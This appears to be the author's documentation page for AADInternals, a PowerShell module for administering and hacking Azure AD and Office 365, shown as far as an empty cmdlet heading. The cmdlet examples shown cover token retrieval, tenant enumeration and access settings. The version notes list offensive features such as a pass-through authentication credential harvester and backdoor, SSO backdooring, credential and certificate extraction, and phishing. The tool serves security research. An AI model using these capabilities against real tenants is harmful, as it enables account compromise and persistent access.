AAD Internals

Introduction

AADInternals PowerShell module contains tools for administering and hacking Azure AD and Office 365.

Installation

The module can be installed from PowerShell:

# Install the module
Install-Module AADInternals

# Import the module
Import-Module AADInternals

Output:

    ___    ___    ____  ____      __                        __    
   /   |  /   |  / __ \/  _/___  / /____  _________  ____ _/ /____
  / /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ '/ / ___/
 / ___ |/ ___ |/ /_/ _/ // / / / /_/  __/ /  / / / / /_/ / (__  ) 
/_/  |_/_/  |_/_____/___/_/ /_/\__/\___/_/  /_/ /_/\__,_/_/____/  
  
 v0.4.4 by @NestoriSyynimaa - Cloud Identity Summit 2020 edition

The module is also available in GitHub https://github.com/Gerenios/AADInternals and PowerShell Gallery.

About

AAD Internals is a PowerShell module where I’ve tried to put all the knowledge I’ve gained during the years spent with Office 365 and Azure AD. It is a result of hours of reverse-engineering and debugging of Microsoft tools related to Azure AD, such as PowerShell modules, directory synchronisation, and admin portals.

The module is a plain PowerShell script module, so you can copy and paste the code to your own scripts as needed. Having said that, the are some functions that are utilising the built-in functionality of Windows. Thus, everything might not work on every computer.

The module is now on beta, so all comments and ideas are more than welcome. You can comment to this article or post bugs and fixes to GitHub.

I haven’t tried to duplicate all functionality MSOnline or AzureAD modules currently have. Instead, I decided to bring that information and functionality those modules doesn’t provide. Also, I have created some “blackhat” level functionality that allows administrators to do things that shouldn’t be even possible..

Detailed help about parameters etc. can be seen using PowerShell Get-Help cmdlet:

# See help for Get-AADIntAccessTokenForAADGraph
Get-Help Get-AADIntAccessTokenForAADGraph

Version info

Version Date Version notes
0.4.4 Oct 18th 2020 Cloud Identity Summit 2020 edition”. Added device code authentication support access token functions (-UseDeviceCode).
Added phishing functionality.
Added -GetNonce switch for New-AADIntUserPRTToken.
Added Teams functionality.
0.4.3 Sep 29th 2020 Added Azure Cloud Shell functionality + updates to PRT/MDM.
0.4.2 Sep 9th 2020 Added MDM functionality.
0.4.1 Sep 1st 2020 Added functionality for joining “devices” to Azure AD and Intune MDM. Added PRT functionality. Some bug fixes.
0.4.0 Aug 6th 2020 Updated the Access Token cache behaviour. Now, when saved to cache, access token gets updated automatically if expired.
Added functionality for getting Azure AD tenant information and enumerating users as a an outsider, guest, and insider user.
0.3.3 Jun 3rd 2020 Added functionality for elevating Global Admin to Azure User Access Administrator and functions for accessing some Azure workloads 😁
0.3.2 May 28th 2020 “psconf.eu edition”. Bug fixes and some minor feature updates to existing functions.
0.3.1 May 17th 2020 Added functionality for registering Sync agents (Azure AD Connect cloud provisioning) and listing agent information. Fixed exporting Azure AD Connect credentials and added many AD related Mimikatz-like functions.
0.2.8 Mar 30th 2020 Added functionality for registering PTA Agents and configuring users’ MFA settings. Includes an experimental PTA Agent that emulates Azure AD pass-through authentication.
0.2.7 Dec 12th 2019 “Black Hat Europe edition”.
Added OneDrive for Business functions. Allows bypassing OneDrive (and SharePoint & Teams) domain restrictions.
0.2.6 Oct 30th 2019 “T2 infosec edition”.
Added Kerberos support. Allows getting Access Tokens using Kerberos tickets, and using Seamless Single-Sign-On as backdoor.
0.2.5 Aug 16th 2019 ADFS certificate export finally working! Bug fixes.
0.2.4 Aug 2nd 2019 “Black Hat edition”.
Added client, SPO, and SARA functions, several bug fixes.
0.2.3 May 29th 2019 Added functions to manipulate ADFS token signing certificates.
0.2.2 May 22nd 2019 Added PTASpy (pass-through authentication credential harvester and backdoor).
0.1.8 May 17th 2019 Added functions to extract and reset Azure AD Connect credentials.
0.1.7 May 10th 2019 Added Exchange Online and Outlook functionality + loads of other updates.
0.1.1 Oct 25th 2018 The first beta release.

Functionality

Playing with access tokens

Most of the functions are using REST APIs which require OAuth access tokens. The AADInternals module is using the following types of access tokens. Since version 0.4.0, all tokens are cached if -SaveToCache switch is used. If expired, cached tokens are automatically renewed with the corresponding refresh token.

Token/API Function Remarks
AAD Graph Get-AADIntAccessTokenForAADGraph Functions using AAD Graph access token.
MS Graph Get-AADIntAccessTokenForMSGraph Functions using MS Graph access token.
Pass Through Authentication Get-AADIntAccessTokenForPTA Used when enabling/disabling PTA and Seamless SSO (Desktop SSO)
Azure Admin Portal Get-AADIntAuthTokenForAADIAMAPI Used when inviting guest users.
Exchange Online Get-AADIntAccessTokenForEXO Used with Exchange Online and ActiveSync functions
Support and Recovery Assistant Get-AADIntAccessTokenForSARA Used with Support and Recovery Assistant functions
SharePoint Online Get-AADIntSPOAuthenticationHeader Used with SharePoint Online functions
OneDrive for Business New-AADIntOneDriveSettings Used with OneDrive for Business functions
Azure Core Management Get-AADIntAccessTokenForAzureCoreManagemnt Used with Azure Core Management functions
Azure AD Join Get-AADIntAccessTokenForAADJoin Used with Azure AD join function
Azure Intune MD Get-AADIntAccessTokenForIntuneMDM Used with Intune MDM functions
Azure Cloud Shell Get-AADIntAccessTokenForCloudShell Used with Azure Cloud Shell

To get an AAD Graph access token and save it to cache, run the following function. The token will be valid for an hour, after that, a new access token is fetched using the refresh token.

# Prompt for credentials and retrieve & store access token to cache
Get-AADIntAccessTokenForAADGraph -SaveToCache

To see the cached credentials:

# Show the cached credentials
Get-AADIntCache
Output:

Name            : admin@company.com
ClientId        : d3590ed6-52b3-4102-aeff-aad2292ab01c
Audience        : https://management.core.windows.net
Tenant          : 2b55c1c4-ba18-46d0-9a7a-7a75b9493dbd
IsExpired       : False
HasRefreshToken : True

Name            : admin@company.com
ClientId        : 1b730954-1685-4b74-9bfd-dac224a7b894
Audience        : https://graph.windows.net
Tenant          : 2b55c1c4-ba18-46d0-9a7a-7a75b9493dbd
IsExpired       : False
HasRefreshToken : True

To delete the cache:

# Clear credentials cache
Clear-AADIntCache

Tenant information and manipulation functions

Information functions are functions that can be used to retrieve information about users, tenants, and Office 365. Functions marked with * doesn’t need authentication. Functions marked with A uses AAD Graph access token.

Get-AADIntLoginInformation (*)

This function returns login information for the given user (or domain).

Example:

# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com

Output:

Federation Protocol                  : WSTrust
Pref Credential                      : 4
Consumer Domain                      : 
Cloud Instance audience urn          : urn:federation:MicrosoftOnline
Authentication Url                   : https://msft.sts.microsoft.com/adfs/ls/?username=nn%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
Throttle Status                      : 1
Account Type                         : Federated
Has Password                         : True
Federation Active Authentication Url : https://msft.sts.microsoft.com/adfs/services/trust/2005/usernamemixed
Exists                               : 0
Federation Metadata Url              : https://msft.sts.microsoft.com/adfs/services/trust/mex
Desktop Sso Enabled                  : 
Tenant Banner Logo                   : 
Tenant Locale                        : 
Cloud Instance                       : microsoftonline.com
State                                : 3
Domain Type                          : 4
Domain Name                          : microsoft.com
Tenant Banner Illustration           : 
Federation Brand Name                : Microsoft
Federation Global Version            : -1
User State                           : 2

Get-AADIntEndpointInstances (*)

This function returns Office 365 instances and information when the latest changes have been made (e.g. ips & urls).

Example:

# Get Office 365 instances
Get-AADIntEndpointInstances 

Output:

instance     latest    
--------     ------    
Worldwide    2018100100
USGovDoD     2018100100
USGovGCCHigh 2018100100
China        2018100100
Germany      2018100100

Get-AADIntEndpointIps (*)

This function returns Office 365 ip addresses and urls for the given instance. The information can be used to create firewall rules.

Example:

# Get ips and urls for "normal" Office 365
Get-AADIntEndpointIps -Instance WorldWide

Output:

id                     : 1
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {outlook.office.com, outlook.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 80,443
expressRoute           : True
category               : Optimize
required               : True

id                     : 2
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {smtp.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 587
expressRoute           : True
category               : Allow
required               : True

Get-AADIntTenantDetails (A)

This function returns details for the given tenant.

Example:

# Get tenant details
Get-AADIntTenantDetails

Output:

odata.type                           : Microsoft.DirectoryServices.TenantDetail
objectType                           : Company
objectId                             : e21e0e8c-d2ed-4edf-aa91-937963949cdc
deletionTimestamp                    : 
assignedPlans                        : ..
city                                 : 
companyLastDirSyncTime               : 2018-10-25T12:53:43Z
country                              : 
countryLetterCode                    : FI
dirSyncEnabled                       : True
displayName                          : Company Ltd
marketingNotificationEmails          : {}
postalCode                           : 
preferredLanguage                    : en
privacyProfile                       : 
provisionedPlans                     : ..
provisioningErrors                   : {}
securityComplianceNotificationMails  : {}
securityComplianceNotificationPhones : {}
state                                : 
street                               : 
technicalNotificationMails           : {user@alt.none}
telephoneNumber                      : 123456789
verifiedDomains                      : ..

Get-AADIntTenantID (*)

Since version 0.1.6
This function returns tenant id for the given user, domain, or Access Token.

Example:

# Get tenant ID
Get-AADIntTenantID -Domain microsoft.com

Output:

72f988bf-86f1-41af-91ab-2d7cd011db47

Get-AADIntOpenIDConfiguration (*)

Since version 0.1.6
This function returns the open ID configuration for the given user or domain.

Example:

# Get tenant ID
Get-AADIntOpenIDConfiguration -Domain microsoft.com

Output:

authorization_endpoint                : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
token_endpoint                        : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/token
token_endpoint_auth_methods_supported : {client_secret_post, private_key_jwt, client_secret_basic}
jwks_uri                              : https://login.microsoftonline.com/common/discovery/keys
response_modes_supported              : {query, fragment, form_post}
subject_types_supported               : {pairwise}
id_token_signing_alg_values_supported : {RS256}
http_logout_supported                 : True
frontchannel_logout_supported         : True
end_session_endpoint                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/logout
response_types_supported              : {code, id_token, code id_token, token id_token...}
scopes_supported                      : {openid}
issuer                                : https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/
claims_supported                      : {sub, iss, cloud_instance_name, cloud_instance_host_name...}
microsoft_multi_refresh_token         : True
check_session_iframe                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/checksession
userinfo_endpoint                     : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/openid/userinfo
tenant_region_scope                   : WW
cloud_instance_name                   : microsoftonline.com
cloud_graph_host_name                 : graph.windows.net
msgraph_host                          : graph.microsoft.com
rbac_url                              : https://pas.windows.net

Get-AADIntServiceLocations (A)

This function shows the tenant’s true service locations.

Example:

# Get service location information of the tenant
Get-AADIntServiceLocations | Format-Table

Output:

Region Instance             Name                          State Country
------ --------             ----                          ----- -------
EU     EU001                PowerBI                             IR     
EU     PROD_MSUB01_02       SCO                                 IE     
NA     NA001                MultiFactorService                  US     
NA     NA001                AzureAdvancedThreatAnalytics        US     
EU     Prod04               Adallom                             GB     
NA     NA001                AADPremiumService                   US     
EU     EURP191-001-01       exchange                            IE     
NA     NA003                YammerEnterprise                    US     
NA     NA001                To-Do                               US     
NA     NA001                TeamspaceAPI                        US     
NA     NA001                Sway                                US     
EU     SPOS1196             SharePoint                          NL     
EU     EU                   RMSOnline                           NL     
EU     PROD_EU_Org_Ring_152 ProjectWorkManagement               NL     
NA     NA001                ProcessSimple                       US     
NA     NA001                PowerAppsService                    US     
NA     NA001                OfficeForms                         US     
NA     NA001                MicrosoftStream                     US     
NA     NorthAmerica1        MicrosoftOffice                     US     
EU     EMEA-2E-S3           MicrosoftCommunicationsOnline       NL     
EU     emea05-01            ExchangeOnlineProtection            NL     
NA     NA001                Deskless                            US     
NA     NA002                SMIT                                US     
NA     NA001                Metro                               US     
EU     EU003                DirectoryToCosmos                   GB     
NA     *                    BecWSClients                        US     
NA     NA033                BDM                                 US     
EU     EUGB02               AadAllTenantsNotifications          GB

Get-AADIntServicePlans (A)

This function returns information about tenant’s service plans, such as name, id, status, and when first assigned.

Example:

# Get the service plans of the tenant
Get-AADIntServicePlans | Format-Table

Output:

SKU               ServicePlanId                        ServiceName           ServiceType                   AssignedTimestamp    CapabilityStatus ProvisioningStatus
---               -------------                        -----------           -----------                   -----------------    ---------------- ------------------
ENTERPRISEPREMIUM b1188c4c-1b36-4018-b48b-ee07604f6feb PAM_ENTERPRISE        Exchange                      2018-09-27T15:47:45Z Enabled          Success           
                  76846ad7-7776-4c40-a281-a386362dd1b9                       ProcessSimple                 2018-09-27T15:47:25Z Deleted                            
                  c87f142c-d1e9-4363-8630-aaea9c4d9ae5                       To-Do                         2018-09-27T15:47:24Z Deleted                            
                  c68f8d98-5534-41c8-bf36-22fa496fa792                       PowerAppsService              2018-09-27T15:47:25Z Deleted                            
                  9e700747-8b1d-45e5-ab8d-ef187ceec156                       MicrosoftStream               2018-09-27T15:47:25Z Deleted                            
                  2789c901-c14e-48ab-a76a-be334d9d793a                       OfficeForms                   2018-09-27T15:47:25Z Deleted                            
ENTERPRISEPREMIUM 9f431833-0334-42de-a7dc-70aa40db46db LOCKBOX_ENTERPRISE    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 3fb82609-8c27-4f7b-bd51-30634711ee67 BPOS_S_TODO_3         To-Do                         2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 7547a3fe-08ee-4ccb-b430-5077c5041653 YAMMER_ENTERPRISE     YammerEnterprise              2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8e0c0a52-6a6c-4d40-8370-dd62790dcd70 THREAT_INTELLIGENCE   Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 9c0dab89-a30c-4117-86e7-97bda240acd2 POWERAPPS_O365_P3     PowerAppsService              2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM b737dad2-2f6c-4c65-90e3-ca563267e8b9 PROJECTWORKMANAGEMENT ProjectWorkManagement         2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 5dbe027f-2339-4123-9542-606e4d348a72 SHAREPOINTENTERPRISE  SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c098270-9dd4-4350-9b30-ba4703f3b36b ADALLOM_S_O365        Adallom                       2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 6c6042f5-6f01-4d67-b8c1-eb99d36eed3e STREAM_O365_E5        MicrosoftStream               2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 07699545-9485-468e-95b6-2fca3738be01 FLOW_O365_P3          ProcessSimple                 2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4de31727-a228-4ec3-a5bf-8e45b5ca48cc EQUIVIO_ANALYTICS     Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 0feaeb32-d00e-4d66-bd5a-43b5b83db82c MCOSTANDARD           MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 70d33638-9c74-4d01-bfd3-562de28bd4ba BI_AZURE_P2           PowerBI                       2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 43de0ff5-c92c-492b-9116-175376d08c38 OFFICESUBSCRIPTION    MicrosoftOffice               2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 3e26ee1f-8a5f-4d52-aee2-b81ce45c8f40 MCOMEETADV            MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e95bec33-7c88-4a70-8e19-b10bd9d0c014 SHAREPOINTWAC         SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c7d2df8-86f0-4902-b2ed-a0458298f3b3 Deskless              Deskless                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 57ff2da0-773e-42df-b2af-ffb7a2317929 TEAMS1                TeamspaceAPI                  2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4828c8ec-dc2e-4779-b502-87ac9ce28ab7 MCOEV                 MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 34c0d7a0-a70f-4668-9238-47f9fc208882 EXCHANGE_ANALYTICS    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM f20fedf3-f3c3-43c3-8267-2bfdd51c0939 ATP_ENTERPRISE        Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM efb87545-963c-4e0d-99df-69c6916d9eb0 EXCHANGE_S_ENTERPRISE Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e212cbc7-0961-4c40-9825-01117710dcb1 FORMS_PLAN_E5         OfficeForms                   2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM a23b959c-7ce8-4e57-9140-b90eb88a9e97 SWAY                  Sway                          2018-08-27T05:46:51Z Enabled          Success           
EMSPREMIUM        113feb6c-3fe4-4440-bddc-54d774bf0318 EXCHANGE_S_FOUNDATION Exchange                      2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        eec0eb4f-6444-4f95-aba0-50c24d67f998 AAD_PREMIUM_P2        AADPremiumService             2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        c1ec4a95-1f05-45b3-a911-aa3fa01094f5 INTUNE_A              SCO                           2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2 ADALLOM_S_STANDALONE  Adallom                       2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        6c57d4b6-3b23-47a5-9bc9-69f17b4947b3 RMS_S_PREMIUM         RMSOnline                     2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        41781fb2-bc02-4b7c-bd55-b576c07bb09d AAD_PREMIUM           AADPremiumService             2018-08-13T10:17:34Z Enabled          Success           
EMSPREMIUM        14ab5db5-e6c4-4b20-b4bc-13e36fd2227f ATA                   AzureAdvancedThreatAnalytics  2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        8a256a2b-b617-496d-b51b-e76466e88db0 MFA_PREMIUM           MultiFactorService            2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        5689bec4-755d-4753-8b61-40975025187c RMS_S_PREMIUM2        RMSOnline                     2018-08-13T10:17:31Z Enabled          Success           
ENTERPRISEPREMIUM 882e1d05-acd1-4ccb-8708-6ee03664b117 INTUNE_O365           SCO                           2018-07-26T15:47:50Z Deleted          PendingActivation 
EMSPREMIUM        bea4c11e-220a-4e6d-8eb8-8ea15d019f90 RMS_S_ENTERPRISE      RMSOnline                     2018-06-26T10:47:37Z Enabled          Success

Get-AADIntSubscriptions (A)

This function returns tenant’s subscription details, such as name, id, number of licenses, and when created.

Example:

# Get subscriptions of the tenant
Get-AADIntSubscriptions

Output:

SkuPartNumber     WarningUnits TotalLicenses IsTrial NextLifecycleDate    OcpSubscriptionId                    ConsumedUnits ObjectId                             SkuId                                DateCreated         
-------------     ------------ ------------- ------- -----------------    -----------------                    ------------- --------                             -----                                -----------         
EMSPREMIUM        0            250           true    2018-11-13T00:00:00Z 76909010-12ed-4b05-b3d7-ee1b42c21b4e 21            58265dbe-24e0-4cdb-8b62-51197a4c1c13 b05e124f-c7cc-45a0-a6aa-8cf78c946968 2018-08-13T00:00:00Z
ENTERPRISEPREMIUM 25           25            true    2018-10-27T15:47:40Z 7c206b83-2487-49fa-b91e-3d676de02ccb 21            df58544b-5062-4d6c-85de-937f203bbe0f c7df2760-2c81-4ef7-b578-5b5392b571df 2018-08-27T00:00:00Z

Get-AADIntSPOServiceInformation (A)

This function returns details of tenant’s SharePoint Online instance, such as when created and last modified.

Example:

# Get SharePoint Online information
Get-AADIntSPOServiceInformation

Output: (sorted for clarity)

CreatedOn                               : 6/26/2018 11:16:12 AM
EnableOneDriveforSuiteUsers             : False
InstanceId                              : 44f5a625-f90e-4916-b8ab-ec45d38bdbb6
LastModifiedOn                          : 10/25/2018 7:37:38 AM
OfficeGraphUrl                          : https://company-my.sharepoint.com/_layouts/15/me.aspx
RootAdminUrl                            : https://company-admin.sharepoint.com/
RootIWSPOUrl                            : https://company-my.sharepoint.com/
SPO_LegacyPublicWebSiteEditPage         : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl        : 
SPO_LegacyPublicWebSiteUrl              : 
SPO_MySiteHostUrl                       : https://company-my.sharepoint.com/
SPO_MySiteHost_AboutMeUrl               : https://company-my.sharepoint.com/person.aspx
SPO_MySiteHost_DocumentsUrl             : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_NewsFeedUrl              : https://company-my.sharepoint.com/default.aspx
SPO_MySiteHost_ProjectSiteUrl           : https://company-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_MySiteHost_SitesUrl                 : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_PublicWebSitePublicUrl              : 
SPO_PublicWebSiteUrl                    : NotSupported
SPO_RegionalRootSiteUrl                 : https://company.sharepoint.com/
SPO_RootSiteUrl                         : https://company.sharepoint.com/
SPO_TenantAdminUrl                      : https://company-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://company-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ProjectAdminUrl         : https://company-admin.sharepoint.com/
SPO_TenantAdmin_ViewSiteCollectionsUrl  : https://company-admin.sharepoint.com/
SPO_TenantUpgradeUrl                    : https://company-admin.sharepoint.com/
ServiceInformation_LastChangeDate       : 10/25/2018 7:37:22 AM
ShowSites_InitialVisibility             : True
ShowSkyDrivePro_InitialVisibility       : True
ShowYammerNewsFeed_InitialVisibility    : True
VideoPortalServerRelativeUrl            : /portals/hub/_layouts/15/videohome.aspx

Get-AADIntCompanyInformation (A)

This function returns details about tenant’s company information. Pretty much same functionality than Get-MsolCompanyInformation cmdlet.

Example:

# Get company information of the tenant
Get-AADIntCompanyInformation

Output:

AllowAdHocSubscriptions                  : false
AllowEmailVerifiedUsers                  : false
AuthorizedServiceInstances               : AuthorizedServiceInstances
AuthorizedServices                       : 
City                                     : 
CompanyDeletionStartTime                 : 
CompanyTags                              : CompanyTags
CompanyType                              : CompanyTenant
CompassEnabled                           : 
Country                                  : 
CountryLetterCode                        : GB
DapEnabled                               : 
DefaultUsageLocation                     : 
DirSyncAnchorAttribute                   : 
DirSyncApplicationType                   : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DirSyncClientMachineName                 : SERVER2016
DirSyncClientVersion                     : 1.1.882.0
DirSyncServiceAccount                    : Sync_SERVER2016_acf4f37725ce@company.onmicrosoft.com
DirectorySynchronizationEnabled          : true
DirectorySynchronizationStatus           : Enabled
DisplayName                              : Company Ltd
InitialDomain                            : company.onmicrosoft.com
LastDirSyncTime                          : 2018-10-25T13:53:46Z
LastPasswordSyncTime                     : 2018-10-25T14:03:01Z
MarketingNotificationEmails              : 
MultipleDataLocationsForServicesEnabled  : 
ObjectId                                 : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
PasswordSynchronizationEnabled           : true
PortalSettings                           : PortalSettings
PostalCode                               : 
PreferredLanguage                        : en
ReleaseTrack                             : StagedRollout
ReplicationScope                         : EU
RmsViralSignUpEnabled                    : false
SecurityComplianceNotificationEmails     : 
SecurityComplianceNotificationPhones     : 
SelfServePasswordResetEnabled            : false
ServiceInformation                       : ServiceInformation
ServiceInstanceInformation               : ServiceInstanceInformation
State                                    : 
Street                                   : 
SubscriptionProvisioningLimited          : false
TechnicalNotificationEmails              : TechnicalNotificationEmails
TelephoneNumber                          : 123456789
UIExtensibilityUris                      : 
UsersPermissionToCreateGroupsEnabled     : false
UsersPermissionToCreateLOBAppsEnabled    : false
UsersPermissionToReadOtherUsersEnabled   : true
UsersPermissionToUserConsentToAppEnabled : false

Get-AADIntCompanyTags (A)

This function returns tags attached to the tenant. Microsoft uses these to identity the status of certain changes, such as SharePoint version update.

Example:

# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com

Output:

azure.microsoft.com/azure=active
o365.microsoft.com/startdate=635711754831829038
o365.microsoft.com/version=15
o365.microsoft.com/signupexperience=GeminiSignUpUI
o365.microsoft.com/14to15UpgradeScheduled=True
o365.microsoft.com/14to15UpgradeCompletedDate=04-16-2013

Get-AADIntSyncConfiguration (A)

This function returns synchronisation details.

Example:

# Get tenant sync configuration
Get-AADIntSyncConfiguration

Output:

TresholdCount                           : 501
UserContainer                           : 
TenantId                                : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
ApplicationVersion                      : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DisplayName                             : Company Ltd
IsPasswordSyncing                       : true
AllowedFeatures                         : {ObjectWriteback,  , PasswordWriteback}
PreventAccidentalDeletion               : EnabledForCount
TotalConnectorSpaceObjects              : 15
MaxLinksSupportedAcrossBatchInProvision : 15000
UnifiedGroupContainer                   : 
IsTrackingChanges                       : false
ClientVersion                           : 1.1.882.0
DirSyncFeatures                         : 41021
SynchronizationInterval                 : PT30M
AnchorAttribute                         : 
DirSyncClientMachine                    : SERVER2016
IsDirSyncing                            : true
TresholdPercentage                      : 0

Get-AADIntTenantDomains (E)

Since version 0.1.6
This function returns all domains from the tenant of the given domain. The given user MUST have GlobalAdmin / CompanyAdministrator role in the tenant running the function, but no rights to the target tenant is needed. Works fine with trials tenants too..

Example:

# Get the access token
$at = Get-AADIntAccessTokenForEXO

# List domains from tenant where company.com is registered
Get-AADIntTenantDomains -AccessToken $at -Domain company.com

Output:

company.com
company.fi
company.co.uk
company.onmicrosoft.com
company.mail.onmicrosoft.com

Get-AADIntKerberosDomainSyncConfig (A)

Since version 0.3.1
Gets tenant’s Kerberos domain sync configuration using Azure AD Sync API

Example:

# Get the access token
$at = Get-AADIntAccessTokenForAADGraph

# Dump the Kerberos domain sync config
Get-AADIntKerberosDomainSyncConfig -AccessToken $at

Output:

PublicEncryptionKey                                                                              SecuredEncryptionAlgorithm SecuredKeyId SecuredPartitionId
-------------------                                                                              -------------------------- ------------ ------------------
RUNLMSAAAABOD8OPj7I3nfeuh7ELE47OtA3yvyryQ0wamf5jPy2uGKibaTRKJd/kFexTpJ8siBxszKCXC2sn1Fd9pEG2y7fu 5                          2            15001 

Get-AADIntWindowsCredentialsSyncConfig (A)

Since version 0.3.1
Gets tenant’s Windows credentials synchronization config

Example:

# Get the access token
$at = Get-AADIntAccessTokenForAADGraph

# Dump the Windows Credentials sync
Get-AADIntWindowsCredentialsSyncConfig -AccessToken $at

Output:

EnableWindowsLegacyCredentials EnableWindowsSupplementaCredentials SecretEncryptionCertificate                                                                            
------------------------------ ----------------------------------- ---------------------------                                                                            
                          True                               False MIIDJTCCAg2gAwIBAgIQFwRSInW7I...

Get-AADIntSyncDeviceConfiguration (A)

Since version 0.3.1
Gets tenant’s Windows credentials synchronization config. Does not require admin rights.

Example:

# Get the access token
$at = Get-AADIntAccessTokenForAADGraph

# Dump the Sync Device configuration
Get-AADIntSyncDeviceConfiguration -AccessToken $at

Output:

PublicIssuerCertificates CloudPublicIssuerCertificates                                                                                                                    
------------------------ -----------------------------                                                                                                                    
{$null}                  {MIIDejCCAmKgAwIBAgIQzsvx7rE77rJM...

Get-AADIntTenantAuthPolicy (M)

Since version 0.4.3
Gets tenant’s authorization policy, including user and guest settings.

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Dump the tenant authentication policy
Get-AADIntTenantAuthPolicy

Output:

id                                                : authorizationPolicy
allowInvitesFrom                                  : everyone
allowedToSignUpEmailBasedSubscriptions            : True
allowedToUseSSPR                                  : True
allowEmailVerifiedUsersToJoinOrganization         : False
blockMsolPowerShell                               : False
displayName                                       : Authorization Policy
description                                       : Used to manage authorization related settings across the company.
enabledPreviewFeatures                            : {}
guestUserRoleId                                   : a0b1b346-4d3e-4e8b-98f8-753987be4970
permissionGrantPolicyIdsAssignedToDefaultUserRole : {microsoft-user-default-legacy}
defaultUserRolePermissions                        : @{allowedToCreateApps=True; allowedToCreateSecurityGroups=True;
                                                    allowedToReadOtherUsers=True}

Get-AADIntTenantGuestAccess (M)

Since version 0.4.3
Gets the guest access level of the user’s tenant.

Access level Description
Inclusive Guest users have the same access as members
Normal Guest users have limited access to properties and memberships of directory objects
Restricted Guest user access is restricted to properties and memberships of their own directory objects (most restrictive)

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Get the tenant guest access
Get-AADIntTenantGuestAccess

Output:

Access Description                                                                        RoleId                              
------ -----------                                                                        ------                              
Normal Guest users have limited access to properties and memberships of directory objects 10dae51f-b6af-4016-8d66-8c2a99b929b3

Set-AADIntTenantGuestAccess (M)

Since version 0.4.3
Sets the guest access level of the user’s tenant.

Access level Description
Inclusive Guest users have the same access as members
Normal Guest users have limited access to properties and memberships of directory objects
Restricted Guest user access is restricted to properties and memberships of their own directory objects (most restrictive)

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Get the tenant guest access
Set-AADIntTenantGuestAccess

Output:

Access Description                                                                        RoleId                              
------ -----------                                                                        ------                              
Normal Guest users have limited access to properties and memberships of directory objects 10dae51f-b6af-4016-8d66-8c2a99b929b3

Enable-AADIntTenantMsolAccess (M)

Since version 0.4.3
Enables Msol PowerShell module access for the user’s tenant.

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Enable the Msol PowerShell module access
Enable-AADIntTenantMsolAccess

# Check the settings
Get-AADIntTenantAuthPolicy | Select block*

Output:

blockMsolPowerShell
-------------------
              False

Disable-AADIntTenantMsolAccess (M)

